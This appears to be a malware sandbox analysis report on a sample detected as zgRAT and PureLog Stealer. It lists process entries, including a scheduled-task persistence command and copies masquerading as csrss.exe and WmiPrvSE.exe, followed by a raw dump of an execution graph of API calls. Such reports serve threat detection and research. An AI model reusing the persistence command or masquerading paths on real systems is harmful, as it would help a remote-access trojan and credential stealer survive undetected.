                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "AgentMonitorA" /sc MINUTE /mo 12 /tr "'C:\Blockcomcrt\AgentMonitor.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:33
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\elmTxMluu5.bat"
                                    Imagebase:0x7ff63a1b0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:34
                                    Start time:09:45:36
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6ee680000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:35
                                    Start time:09:45:36
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\chcp.com
                                    Wow64 process (32bit):false
                                    Commandline:chcp 65001
                                    Imagebase:0x7ff7bcc90000
                                    File size:14'848 bytes
                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:36
                                    Start time:09:45:36
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\w32tm.exe
                                    Wow64 process (32bit):false
                                    Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Imagebase:0x7ff785fa0000
                                    File size:108'032 bytes
                                    MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:37
                                    Start time:09:45:37
                                    Start date:25/08/2024
                                    Path:C:\Blockcomcrt\AgentMonitor.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Blockcomcrt\AgentMonitor.exe
                                    Imagebase:0xc10000
                                    File size:1'961'472 bytes
                                    MD5 hash:84072063FC067434706597D88E3252A9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:38
                                    Start time:09:45:37
                                    Start date:25/08/2024
                                    Path:C:\Blockcomcrt\AgentMonitor.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Blockcomcrt\AgentMonitor.exe
                                    Imagebase:0x8e0000
                                    File size:1'961'472 bytes
                                    MD5 hash:84072063FC067434706597D88E3252A9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:39
                                    Start time:09:45:37
                                    Start date:25/08/2024
                                    Path:C:\Recovery\csrss.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Recovery\csrss.exe
                                    Imagebase:0xc20000
                                    File size:1'961'472 bytes
                                    MD5 hash:84072063FC067434706597D88E3252A9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\csrss.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\csrss.exe, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 88%, ReversingLabs
                                    • Detection: 55%, Virustotal, Browse
                                    Has exited:true

                                    Target ID:40
                                    Start time:09:45:37
                                    Start date:25/08/2024
                                    Path:C:\Recovery\csrss.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Recovery\csrss.exe
                                    Imagebase:0x650000
                                    File size:1'961'472 bytes
                                    MD5 hash:84072063FC067434706597D88E3252A9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:45
                                    Start time:09:45:41
                                    Start date:25/08/2024
                                    Path:C:\Blockcomcrt\WmiPrvSE.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Blockcomcrt\WmiPrvSE.exe"
                                    Imagebase:0x520000
                                    File size:1'961'472 bytes
                                    MD5 hash:84072063FC067434706597D88E3252A9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Blockcomcrt\WmiPrvSE.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Blockcomcrt\WmiPrvSE.exe, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 88%, ReversingLabs
                                    • Detection: 55%, Virustotal, Browse
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:6.2%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:21%
                                      Total number of Nodes:1073
                                      Total number of Limit Nodes:67
50d50d ShowWindow SendMessageW SendMessageW 42421->42425 42422 50d536 SendMessageW SendMessageW 42423 50d591 SendMessageW SendMessageW SendMessageW 42422->42423 42424 50d572 42422->42424 42426 50d5c4 SendMessageW 42423->42426 42427 50d5e7 SendMessageW 42423->42427 42424->42423 42425->42422 42426->42427 42427->42240 42428->42300 42429->42321 42430->42324 42431->42327 42432->42333 42433->42331 42434->42273 42435->42289 42436->42263 42437->42255 42438->42340 42439->42337 42441 4fa2bf 42440->42441 42442 4fa2e3 42441->42442 42443 4fa2d6 CreateDirectoryW 42441->42443 42444 4fa231 2 API calls 42442->42444 42443->42442 42445 4fa2e9 42443->42445 42444->42445 42446 4fa325 42445->42446 42448 4fa4ed 42445->42448 42446->42347 42449 50ec50 42448->42449 42450 4fa4fa SetFileAttributesW 42449->42450 42451 4fa510 42450->42451 42451->42446 42452->42366 42453->42366 42454->42366 42456 500666 _wcslen 42455->42456 42483 4f17e9 42456->42483 42458 50067e 42458->42372 42460 500659 _wcslen 42459->42460 42461 4f17e9 23 API calls 42460->42461 42462 50067e 42461->42462 42462->42374 42464 4f7b17 __EH_prolog 42463->42464 42500 4fce40 42464->42500 42466 4f7b32 42467 50eb38 UnhandledExceptionFilter 42466->42467 42468 4f7b5c 42467->42468 42506 504a76 42468->42506 42471 4f7c7d 42472 4f7c87 42471->42472 42474 4f7cf1 42472->42474 42534 4fa56d 42472->42534 42476 4f7d50 42474->42476 42513 4f8284 42474->42513 42475 4f7d92 42475->42378 42476->42475 42540 4f138b 23 API calls 42476->42540 42480 4f7bac 42479->42480 42482 4f7bb3 42479->42482 42481 502297 23 API calls 42480->42481 42481->42482 42484 4f17ff 42483->42484 42495 4f185a __InternalCxxFrameHandler 42483->42495 42485 4f1828 42484->42485 42496 4f6c36 23 API calls __vswprintf_c_l 42484->42496 42486 4f1887 42485->42486 42492 4f1847 ___std_exception_copy 42485->42492 42488 513e3e 2 API calls 42486->42488 42491 4f188e 42488->42491 42489 4f181e 42497 4f6ca7 23 API calls 42489->42497 42491->42495 42499 4f6ca7 23 API calls 42491->42499 42492->42495 42498 
4f6ca7 23 API calls 42492->42498 42495->42458 42496->42489 42497->42485 42498->42495 42499->42495 42501 4fce4a __EH_prolog 42500->42501 42502 50eb38 UnhandledExceptionFilter 42501->42502 42504 4fce8d 42502->42504 42503 50eb38 UnhandledExceptionFilter 42505 4fceb1 42503->42505 42504->42503 42505->42466 42507 504a80 __EH_prolog 42506->42507 42508 50eb38 UnhandledExceptionFilter 42507->42508 42509 504a9c 42508->42509 42510 4f7b8b 42509->42510 42512 500e46 23 API calls 42509->42512 42510->42471 42512->42510 42514 4f828e __EH_prolog 42513->42514 42541 4f13dc 42514->42541 42516 4f82aa 42517 4f82bb 42516->42517 42687 4f9f42 42516->42687 42520 4f82f2 42517->42520 42549 4f1a04 42517->42549 42678 4f1692 42520->42678 42524 4f83a3 42525 4f83e8 42524->42525 42571 501b66 42524->42571 42574 4f1f6d 42525->42574 42528 4f83f3 42528->42520 42578 4f3b2d 42528->42578 42590 4f848e 42528->42590 42530 4fa56d 3 API calls 42531 4f82ee 42530->42531 42531->42520 42531->42530 42533 4f8389 42531->42533 42568 4f8430 42533->42568 42535 4fa582 42534->42535 42539 4fa5b0 42535->42539 42929 4fa69b 42535->42929 42537 4fa592 42538 4fa597 FindClose 42537->42538 42537->42539 42538->42539 42539->42472 42540->42475 42542 4f13e6 __EH_prolog 42541->42542 42543 4fce40 UnhandledExceptionFilter 42542->42543 42544 4f1419 42543->42544 42545 50eb38 UnhandledExceptionFilter 42544->42545 42548 4f1474 _abort 42544->42548 42546 4f1461 42545->42546 42546->42548 42691 4fb505 42546->42691 42548->42516 42550 4f1a0e __EH_prolog 42549->42550 42562 4f1a61 42550->42562 42565 4f1b9b 42550->42565 42710 4f13ba 42550->42710 42552 4f1bc7 42713 4f138b 23 API calls 42552->42713 42555 4f3b2d 25 API calls 42559 4f1c12 42555->42559 42556 4f1bd4 42556->42555 42556->42565 42557 4f1c5a 42561 4f1c8d 42557->42561 42557->42565 42714 4f138b 23 API calls 42557->42714 42559->42557 42560 4f3b2d 25 API calls 42559->42560 42560->42559 42561->42565 42566 4f9e80 24 API calls 42561->42566 42562->42552 42562->42556 42562->42565 42563 4f3b2d 25 API 
calls 42564 4f1cde 42563->42564 42564->42563 42564->42565 42565->42531 42566->42564 42567 4f9e80 24 API calls 42567->42562 42732 4fcf3d 42568->42732 42570 4f8440 42570->42524 42740 50de6b 42571->42740 42575 4f1f77 __EH_prolog 42574->42575 42577 4f1fa6 42575->42577 42748 4f19af 42575->42748 42577->42528 42579 4f3b3d 42578->42579 42580 4f3b39 42578->42580 42589 4f9e80 24 API calls 42579->42589 42580->42528 42581 4f3b4f 42582 4f3b6a 42581->42582 42583 4f3b78 42581->42583 42584 4f3baa 42582->42584 42857 4f32f7 25 API calls 2 library calls 42582->42857 42858 4f286b 25 API calls 3 library calls 42583->42858 42584->42528 42587 4f3b76 42587->42584 42859 4f20d7 23 API calls 42587->42859 42589->42581 42591 4f8498 __EH_prolog 42590->42591 42594 4f84d5 42591->42594 42601 4f8513 42591->42601 42882 508c8d 25 API calls 42591->42882 42593 4f84f5 42595 4f851c 42593->42595 42596 4f84fa 42593->42596 42594->42593 42599 4f857a 42594->42599 42594->42601 42595->42601 42884 508c8d 25 API calls 42595->42884 42596->42601 42883 4f7a0d 35 API calls 42596->42883 42599->42601 42860 4f5d1a 42599->42860 42601->42528 42602 4f8605 42602->42601 42866 4f8167 42602->42866 42605 4f8797 42606 4fa56d 3 API calls 42605->42606 42607 4f8802 42605->42607 42606->42607 42872 4f7c0d 42607->42872 42609 4fd051 23 API calls 42615 4f885d 42609->42615 42610 4f8a5f 42616 4f8ab6 42610->42616 42629 4f8a6a 42610->42629 42611 4f8992 42611->42610 42618 4f89e1 42611->42618 42612 4f898b 42887 4f2021 23 API calls 42612->42887 42615->42601 42615->42609 42615->42611 42615->42612 42885 4f8117 24 API calls 42615->42885 42886 4f2021 23 API calls 42615->42886 42621 4f8a4c 42616->42621 42890 4f7fc0 32 API calls 42616->42890 42617 4f8ab4 42622 4f959a 25 API calls 42617->42622 42618->42621 42623 4fa231 2 API calls 42618->42623 42626 4f8b14 42618->42626 42619 4f9105 42620 4f959a 25 API calls 42619->42620 42620->42601 42621->42617 42621->42626 42622->42601 42625 4f8a19 42623->42625 42625->42621 42888 4f92a3 32 API calls 42625->42888 
42626->42619 42638 4f8b82 42626->42638 42891 4f98bc 42626->42891 42627 4fab1a UnhandledExceptionFilter 42630 4f8bd1 42627->42630 42629->42617 42889 4f7db2 32 API calls 42629->42889 42633 4fab1a UnhandledExceptionFilter 42630->42633 42648 4f8be7 42633->42648 42636 4f8b70 42895 4f6e98 23 API calls 42636->42895 42638->42627 42639 4f8cbc 42640 4f8d18 42639->42640 42641 4f8e40 42639->42641 42642 4f8d8a 42640->42642 42645 4f8d28 42640->42645 42643 4f8e66 42641->42643 42644 4f8e52 42641->42644 42664 4f8d49 42641->42664 42652 4f8167 2 API calls 42642->42652 42647 503377 26 API calls 42643->42647 42646 4f9215 27 API calls 42644->42646 42649 4f8d6e 42645->42649 42656 4f8d37 42645->42656 42646->42664 42650 4f8e7f 42647->42650 42648->42639 42651 4f8c93 42648->42651 42658 4f981a 24 API calls 42648->42658 42649->42664 42898 4f77b8 33 API calls 42649->42898 42901 503020 27 API calls 42650->42901 42651->42639 42896 4f9a3c 26 API calls 42651->42896 42655 4f8dbd 42652->42655 42660 4f8de6 42655->42660 42661 4f8df5 42655->42661 42655->42664 42897 4f2021 23 API calls 42656->42897 42658->42651 42899 4f7542 27 API calls 42660->42899 42900 4f9155 28 API calls __EH_prolog 42661->42900 42669 4f8f85 42664->42669 42902 4f2021 23 API calls 42664->42902 42666 4f9090 42666->42619 42668 4fa4ed SetFileAttributesW 42666->42668 42667 4f903e 42879 4f9da2 42667->42879 42670 4f90eb 42668->42670 42669->42619 42669->42666 42669->42667 42878 4f9f09 SetEndOfFile 42669->42878 42670->42619 42903 4f2021 23 API calls 42670->42903 42673 4f9085 42674 4f9620 24 API calls 42673->42674 42674->42666 42676 4f90fb 42904 4f6dcb 23 API calls _wcschr 42676->42904 42679 4f16a4 42678->42679 42920 4fcee1 42679->42920 42688 4f9f59 42687->42688 42690 4f9f63 42688->42690 42928 4f6d0c 23 API calls 42688->42928 42690->42517 42692 4fb50f __EH_prolog 42691->42692 42697 4ff1d0 23 API calls 42692->42697 42694 4fb521 42698 4fb61e 42694->42698 42697->42694 42699 4fb630 _abort 42698->42699 42702 5010dc 42699->42702 42705 50109e 
42702->42705 42706 5010b1 42705->42706 42709 4ae685b NtQueryInformationProcess GetSystemInfo 42706->42709 42707 4fb597 42707->42548 42709->42707 42715 4f1732 42710->42715 42712 4f13d6 42712->42567 42713->42565 42714->42561 42716 4f1748 42715->42716 42717 4f17a0 __InternalCxxFrameHandler 42715->42717 42718 4f1771 42716->42718 42728 4f6c36 23 API calls __vswprintf_c_l 42716->42728 42717->42712 42720 4f17c7 42718->42720 42725 4f178d ___std_exception_copy 42718->42725 42722 513e3e 2 API calls 42720->42722 42721 4f1767 42729 4f6ca7 23 API calls 42721->42729 42724 4f17ce 42722->42724 42724->42717 42731 4f6ca7 23 API calls 42724->42731 42725->42717 42730 4f6ca7 23 API calls 42725->42730 42728->42721 42729->42718 42730->42717 42731->42717 42733 4fcf4d 42732->42733 42735 4fcf54 42732->42735 42736 4f981a 42733->42736 42735->42570 42737 4f9833 42736->42737 42739 4f9e80 24 API calls 42737->42739 42738 4f9865 42738->42735 42739->42738 42741 50de78 42740->42741 42742 4fe617 7 API calls 42741->42742 42743 50de9b 42742->42743 42744 4f4092 _swprintf 5 API calls 42743->42744 42745 50dead 42744->42745 42746 50d4d4 16 API calls 42745->42746 42747 501b7c 42746->42747 42747->42525 42749 4f19bf 42748->42749 42751 4f19bb 42748->42751 42752 4f18f6 42749->42752 42751->42577 42753 4f1908 42752->42753 42754 4f1945 42752->42754 42755 4f3b2d 25 API calls 42753->42755 42760 4f3fa3 42754->42760 42758 4f1928 42755->42758 42758->42751 42763 4f3fac 42760->42763 42761 4f3b2d 25 API calls 42761->42763 42762 4f1966 42762->42758 42764 4f1e50 42762->42764 42763->42761 42763->42762 42765 4f1e5a __EH_prolog 42764->42765 42774 4f3bba 42765->42774 42767 4f1e84 42768 4f1732 23 API calls 42767->42768 42771 4f1f0b 42767->42771 42769 4f1e9b 42768->42769 42802 4f18a9 23 API calls 42769->42802 42771->42758 42772 4f1eb3 _wcslen 42803 4f18a9 23 API calls 42772->42803 42775 4f3bc4 __EH_prolog 42774->42775 42776 4f3bda 42775->42776 42777 4f3bf6 42775->42777 42827 4f138b 23 API calls 42776->42827 42779 4f3e51 
42777->42779 42782 4f3c22 42777->42782 42842 4f138b 23 API calls 42779->42842 42781 4f3be5 42781->42767 42782->42781 42804 503377 42782->42804 42784 4f3d2e 42814 4fab1a 42784->42814 42785 4f3ca3 42785->42784 42801 4f3c9a 42785->42801 42830 4fd051 42785->42830 42786 4f3c9f 42786->42785 42829 4f20bd 23 API calls 42786->42829 42788 4f3c8f 42828 4f138b 23 API calls 42788->42828 42789 4f3c71 42789->42785 42789->42786 42789->42788 42792 4f3d41 42795 4f3dd7 42792->42795 42796 4f3dc7 42792->42796 42836 503020 27 API calls 42795->42836 42818 4f9215 42796->42818 42799 4f3dd5 42799->42801 42837 4f2021 23 API calls 42799->42837 42838 502297 42801->42838 42802->42772 42803->42771 42805 50338c 42804->42805 42807 503396 ___std_exception_copy 42804->42807 42843 4f6ca7 23 API calls 42805->42843 42808 50341c 42807->42808 42810 503440 _abort 42807->42810 42811 5034c6 _com_raise_error 42807->42811 42844 5032aa 26 API calls 3 library calls 42808->42844 42810->42789 42813 503524 42811->42813 42845 503106 26 API calls 42811->42845 42813->42789 42815 4fab28 42814->42815 42817 4fab32 42814->42817 42816 50eb38 UnhandledExceptionFilter 42815->42816 42816->42817 42817->42792 42819 4f921f __EH_prolog 42818->42819 42820 4f13ba 23 API calls 42819->42820 42821 4f9231 42820->42821 42846 4fd114 42821->42846 42823 4f928a 42823->42799 42825 4fd114 26 API calls 42826 4f9243 42825->42826 42826->42823 42826->42825 42853 4fd300 24 API calls __InternalCxxFrameHandler 42826->42853 42827->42781 42828->42801 42829->42785 42831 4fd084 42830->42831 42832 4fd072 42830->42832 42855 4f603a 23 API calls 42831->42855 42854 4f603a 23 API calls 42832->42854 42835 4fd07c 42835->42784 42836->42799 42837->42801 42839 5022a1 42838->42839 42841 5022c1 42839->42841 42856 500eed 23 API calls 42839->42856 42842->42781 42843->42807 42844->42810 42845->42811 42850 4fd12a __InternalCxxFrameHandler 42846->42850 42847 4fd29a 42848 4fd0cb 6 API calls 42847->42848 42851 4fd291 42847->42851 42848->42851 42849 508c8d 25 API calls 
42849->42850 42850->42847 42850->42849 42850->42851 42852 4fac05 23 API calls 42850->42852 42851->42826 42852->42850 42853->42826 42854->42835 42855->42835 42856->42841 42857->42587 42858->42587 42859->42584 42861 4f5d2a 42860->42861 42905 4f5c4b 42861->42905 42863 4f5d5d 42865 4f5d95 42863->42865 42910 4fb1dc CharUpperW _wcslen ___vcrt_InitializeCriticalSectionEx 42863->42910 42865->42602 42867 4f8186 42866->42867 42868 4f8232 42867->42868 42917 4fbe5e CharUpperW UnhandledExceptionFilter __InternalCxxFrameHandler 42867->42917 42916 501fac CharUpperW 42868->42916 42871 4f823b 42871->42605 42873 4f7c22 42872->42873 42874 4f7c5a 42873->42874 42918 4f6e7a 23 API calls 42873->42918 42874->42615 42876 4f7c52 42919 4f138b 23 API calls 42876->42919 42878->42667 42880 4f9db3 42879->42880 42881 4f9e3f SetFileTime 42880->42881 42881->42673 42882->42594 42883->42601 42884->42601 42885->42615 42886->42615 42887->42611 42888->42621 42889->42617 42890->42621 42892 4f98c5 GetFileType 42891->42892 42893 4f8b5a 42891->42893 42892->42893 42893->42638 42894 4f2021 23 API calls 42893->42894 42894->42636 42895->42638 42896->42639 42897->42664 42898->42664 42899->42664 42900->42664 42901->42664 42902->42669 42903->42676 42904->42619 42911 4f5b48 42905->42911 42908 4f5b48 CharUpperW 42909 4f5c6c 42908->42909 42909->42863 42910->42863 42913 4f5b52 42911->42913 42912 4f5c3a 42912->42908 42912->42909 42913->42912 42915 4fb1dc CharUpperW _wcslen ___vcrt_InitializeCriticalSectionEx 42913->42915 42915->42913 42916->42871 42917->42868 42918->42876 42919->42874 42921 4fcef2 42920->42921 42926 4fa99e 23 API calls 42921->42926 42923 4fcf24 42927 4fa99e 23 API calls 42923->42927 42925 4fcf2f 42926->42923 42927->42925 42928->42690 42930 4fa6a8 42929->42930 42931 4fa6c1 FindFirstFileW 42930->42931 42934 4fa6fe 42930->42934 42932 4fa6d0 42931->42932 42931->42934 42933 4fa6e4 FindFirstFileW 42932->42933 42932->42934 42933->42934 42934->42537 42935->42394 42936->42394 42937->42397 42939 4f9f42 23 API 
calls 42938->42939 42940 4f1fe8 42939->42940 42941 4f1a04 25 API calls 42940->42941 42944 4f2005 42940->42944 42942 4f1ff5 42941->42942 42942->42944 42945 4f138b 23 API calls 42942->42945 42944->42410 42944->42411 42945->42944 42947 50b583 GetMessageW 42946->42947 42948 50b5bc GetDlgItem 42946->42948 42949 50b5a8 TranslateMessage DispatchMessageW 42947->42949 42950 50b599 IsDialogMessageW 42947->42950 42948->42421 42948->42422 42949->42948 42950->42948 42950->42949 41555 5198f0 41563 51adaf 41555->41563 41557 519904 41561 519919 41566 51add6 _unexpected 41563->41566 41565 5198fa 41565->41557 41567 519869 41565->41567 41583 50fbbc 41566->41583 41568 519874 41567->41568 41569 519888 41568->41569 41595 51ae5b UnhandledExceptionFilter __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z _unexpected 41568->41595 41578 5198a8 41569->41578 41589 51b136 41569->41589 41573 5198a2 41596 518dcc 41573->41596 41576 5198b7 41576->41573 41577 5198be 41576->41577 41602 519649 UnhandledExceptionFilter RtlFreeHeap _unexpected 41577->41602 41578->41561 41582 519920 UnhandledExceptionFilter 41578->41582 41580 5198c9 41581 518dcc _free 2 API calls 41580->41581 41581->41578 41582->41557 41584 50fbc4 41583->41584 41585 50fbc5 41583->41585 41584->41565 41588 50fbca UnhandledExceptionFilter 41585->41588 41587 50fcea 41587->41565 41588->41587 41593 51b143 _unexpected 41589->41593 41590 51b183 41604 5191a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 41590->41604 41592 51989a 41592->41573 41601 51aeb1 UnhandledExceptionFilter __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z _unexpected 41592->41601 41593->41590 41593->41592 41603 517a5e UnhandledExceptionFilter __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z _unexpected 41593->41603 41595->41569 41597 518dd7 RtlFreeHeap 41596->41597 41600 518df2 _free 41596->41600 41598 518dec 41597->41598 41597->41600 41605 5191a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 41598->41605 41600->41578 41601->41576 41602->41580 
41603->41593 41604->41592 41605->41600 41606 51bb30 41607 51bb39 41606->41607 41608 51bb42 41606->41608 41610 51ba27 41607->41610 41630 5197e5 41610->41630 41614 51ba3c 41655 51b7bb 41614->41655 41617 51ba53 41617->41608 41621 518dcc _free 2 API calls 41621->41617 41623 51ba91 41671 5191a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 41623->41671 41625 51ba96 41625->41621 41626 51baae 41627 51bada 41626->41627 41628 518dcc _free 2 API calls 41626->41628 41627->41625 41672 51b691 UnhandledExceptionFilter RtlFreeHeap UnhandledExceptionFilter 41627->41672 41628->41627 41631 5197ef 41630->41631 41632 519801 41631->41632 41673 51ae5b UnhandledExceptionFilter __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z _unexpected 41631->41673 41634 51b136 _unexpected 2 API calls 41632->41634 41636 519850 41632->41636 41635 519813 41634->41635 41640 51981b 41635->41640 41674 51aeb1 UnhandledExceptionFilter __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z _unexpected 41635->41674 41648 51bb4e 41636->41648 41638 519830 41638->41640 41641 519837 41638->41641 41639 518dcc _free 2 API calls 41642 519821 41639->41642 41640->41639 41675 519649 UnhandledExceptionFilter RtlFreeHeap _unexpected 41641->41675 41642->41636 41676 518d24 5 API calls _abort 41642->41676 41644 519842 41645 518dcc _free 2 API calls 41644->41645 41645->41642 41649 51bb5a ___scrt_is_nonwritable_in_current_image 41648->41649 41650 5197e5 _unexpected 5 API calls 41649->41650 41651 51bb64 _abort __fassign 41650->41651 41652 51bbe8 _abort 41651->41652 41654 518dcc _free 2 API calls 41651->41654 41677 518d24 5 API calls _abort 41651->41677 41652->41614 41654->41651 41678 514636 41655->41678 41658 518e06 41659 518e44 41658->41659 41660 518e14 _unexpected 41658->41660 41689 5191a8 UnhandledExceptionFilter RtlFreeHeap __dosmaperr 41659->41689 41660->41659 41662 518e42 41660->41662 41688 517a5e UnhandledExceptionFilter __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z _unexpected 41660->41688 41662->41625 
41664 51bbf0 41662->41664 41665 51b7bb 5 API calls 41664->41665 41670 51bc0f _abort 41665->41670 41666 51bc16 41667 50fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z UnhandledExceptionFilter 41666->41667 41668 51ba89 41667->41668 41668->41623 41668->41626 41670->41666 41690 51b893 41670->41690 41671->41625 41672->41625 41673->41632 41674->41638 41675->41644 41679 514653 41678->41679 41680 514649 41678->41680 41679->41680 41681 5197e5 _unexpected 5 API calls 41679->41681 41680->41617 41680->41658 41682 514674 41681->41682 41686 51993a 5 API calls __fassign 41682->41686 41684 51468d 41687 519967 5 API calls __fassign 41684->41687 41686->41684 41687->41680 41688->41660 41689->41662 41691 51b8be 41690->41691 41692 51b977 41691->41692 41700 51c988 41691->41700 41695 50fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z UnhandledExceptionFilter 41692->41695 41697 51ba23 41695->41697 41697->41666 41699 51ab78 __vswprintf_c_l 5 API calls 41699->41692 41701 514636 __fassign 5 API calls 41700->41701 41702 51c9a8 41701->41702 41703 51ca7e 41702->41703 41706 518e06 __vswprintf_c_l 2 API calls 41702->41706 41708 51ca07 _abort __vsnwprintf_l 41702->41708 41704 50fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z UnhandledExceptionFilter 41703->41704 41705 51b92e 41704->41705 41709 51ab78 41705->41709 41706->41708 41714 51abc3 UnhandledExceptionFilter RtlFreeHeap _free 41708->41714 41710 514636 __fassign 5 API calls 41709->41710 41711 51ab8b 41710->41711 41715 51a95b 41711->41715 41714->41703 41717 51a976 __vswprintf_c_l 41715->41717 41716 51ab50 41718 50fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z UnhandledExceptionFilter 41716->41718 41717->41716 41720 518e06 __vswprintf_c_l 2 API calls 41717->41720 41722 51a9e7 __vsnwprintf_l 41717->41722 41719 51ab63 41718->41719 41719->41699 41720->41722 41721 51aa9c 41744 51abc3 UnhandledExceptionFilter RtlFreeHeap _free 41721->41744 41722->41721 41737 51af6c 41722->41737 41726 51aa73 41726->41721 
41728 51af6c __vswprintf_c_l UnhandledExceptionFilter 41726->41728 41727 51aaab 41730 518e06 __vswprintf_c_l 2 API calls 41727->41730 41733 51aacc __vsnwprintf_l 41727->41733 41728->41721 41729 51ab41 41743 51abc3 UnhandledExceptionFilter RtlFreeHeap _free 41729->41743 41730->41733 41731 51af6c __vswprintf_c_l UnhandledExceptionFilter 41734 51ab20 41731->41734 41733->41729 41733->41731 41734->41729 41735 51ab6f 41734->41735 41745 51abc3 UnhandledExceptionFilter RtlFreeHeap _free 41735->41745 41738 51af93 _unexpected 41737->41738 41740 51af9c 41738->41740 41746 51aff4 UnhandledExceptionFilter __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z _unexpected __vswprintf_c_l 41738->41746 41741 50fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z UnhandledExceptionFilter 41740->41741 41742 51aa60 41741->41742 41742->41721 41742->41726 41742->41727 41743->41721 41744->41716 41745->41721 41746->41740 41747 51abf0 41748 51abfb 41747->41748 41750 51ac20 41748->41750 41751 51af0a 41748->41751 41753 51af31 _unexpected 41751->41753 41752 50fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z UnhandledExceptionFilter 41754 51af66 41752->41754 41753->41752 41754->41748 41755 50f3b2 41756 50f3be ___scrt_is_nonwritable_in_current_image 41755->41756 41783 50eed7 41756->41783 41758 50f3c5 41759 50f518 41758->41759 41762 50f3ef 41758->41762 41835 50f838 UnhandledExceptionFilter _abort 41759->41835 41761 50f51f 41829 517f58 41761->41829 41774 50f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 41762->41774 41787 518aed 41762->41787 41769 50f40e 41772 50f48f 41795 518a3e UnhandledExceptionFilter GetPEB RtlFreeHeap UnhandledExceptionFilter RtlExitUserProcess 41772->41795 41774->41772 41832 517af4 5 API calls 2 library calls 41774->41832 41775 50f49d 41796 50df1e 41775->41796 41778 50f4aa 41778->41761 41779 50f4b5 41778->41779 41780 50f4be 41779->41780 41833 517efb UnhandledExceptionFilter GetPEB RtlFreeHeap RtlExitUserProcess _abort 41779->41833 
